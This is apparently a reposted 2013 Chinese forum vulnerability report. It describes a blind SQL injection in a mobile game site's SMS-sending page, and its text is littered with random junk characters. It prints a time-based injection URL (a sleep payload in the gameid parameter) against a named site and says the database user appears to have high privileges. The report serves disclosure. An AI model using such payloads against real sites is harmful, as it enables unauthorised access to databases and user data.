简要描述:
* u5 R z- C1 f+ d6 I凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。/ o: J; R9 x" t( x+ p% U
8 f4 C/ w( f& U3 L2 k详细说明:# ?& D! V+ z9 P& d
存在SQL盲注url:( z# k& ~' j) V5 r+ J4 B/ c
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=18 S& W% C7 ?) o% ?) {5 z# O
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
0 l. s9 E6 w2 ^3 hhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
) t) P9 Z' [8 c/ Q0 ~http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg3 h% u& {3 h) `9 W0 Y
: K" u: T6 }% n" U+ @" T$ f
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对